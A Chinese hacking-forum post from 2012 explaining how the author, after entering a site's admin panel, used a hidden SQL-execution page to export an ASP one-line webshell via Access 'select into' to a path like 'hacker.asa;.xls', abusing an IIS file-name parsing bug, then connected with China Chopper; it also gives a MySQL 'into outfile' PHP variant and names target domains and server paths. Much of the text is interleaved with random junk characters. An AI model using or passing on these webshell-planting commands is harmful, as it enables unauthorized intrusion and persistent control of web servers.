好不容易进了后台,发现啥上传啊。备份啊多木有。
+ g( c. u4 L/ ]/ \2 ?. p! Q( p9 X3 q. Hwebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的5 u, G! h' v8 D, o1 N' B
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
, E2 h' }! c3 `2 O/ z. @ n7 _9 l然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:6 A: S) V5 z9 r# U: l7 Y
1.create table cmd (a varchar(50))2 {* B9 p8 z) C6 ]" L5 e2 A
2.insert into cmd (a) values (‘‘)
- i4 y4 k( t' f: O3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd1 E4 y& A; P! }
(把表cmd的内容导出为物理路径的一个EXCEL文件) O4 @' z: i; x) U8 X
4.drop table cmd6 ?5 X! w' z) s) s7 u+ {
利用IIS的BUG成功拿到了WEBSHELL。, [9 Z2 N( [" B1 z' k
# q8 ?. @4 \. I* ~8 x0 F" B
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话$ b0 L) n! W% _ L; J
# [# g6 I& p5 N& N
SQL语句意思解释:& a$ i6 K% v) ?4 g
第一句
! a* z+ C+ X* T0 S; Q$ P 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 O7 N1 G( N& J% P W6 s+ J5 \0 \$ g7 R
第二句, \+ J) h) W- a3 k
在表cmd的a字段插入一句话木马
9 m/ P* M9 C# ^* g$ e9 o7 d% [+ T 第三句
2 K( r1 k0 ]! H" [ 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件, T# [; m7 Z* x2 w
/ ~ x7 q \: ^( J7 C# t g' n
第四句
" e+ V2 f. r' J 删除建立的cmd表 r1 h/ G2 q# J5 E9 |- D5 R/ u
1 g2 O5 S/ o: c; G+ A, L
以下内容为测试: U/ ?# R, U2 u3 p6 G/ ~
Access利用后台SQL执行命令功能导出WebShell:
$ h* D6 Q1 Z4 H 这个更简单:
. c/ H0 C% p {1 N0 s [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
& W. k# ]6 _% |6 ~0 A. n; ~ 或者
% }. G6 V9 ]2 v+ q6 d) u [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]7 }' ^. K o/ ~* Z2 n+ J, e) u& x
2 D, p4 e" O# S7 r5 ^& r) _; r 后台有执行SQL语句功能(vote为已知表段)
3 T( P, |/ @! O g9 O. ~1 m+ F 希望对大家有所帮助拿shell的又一个思路
5 M+ z4 E4 a$ E A! w- A |
发表于 2012-9-13 17:53:58
收藏
支持
反对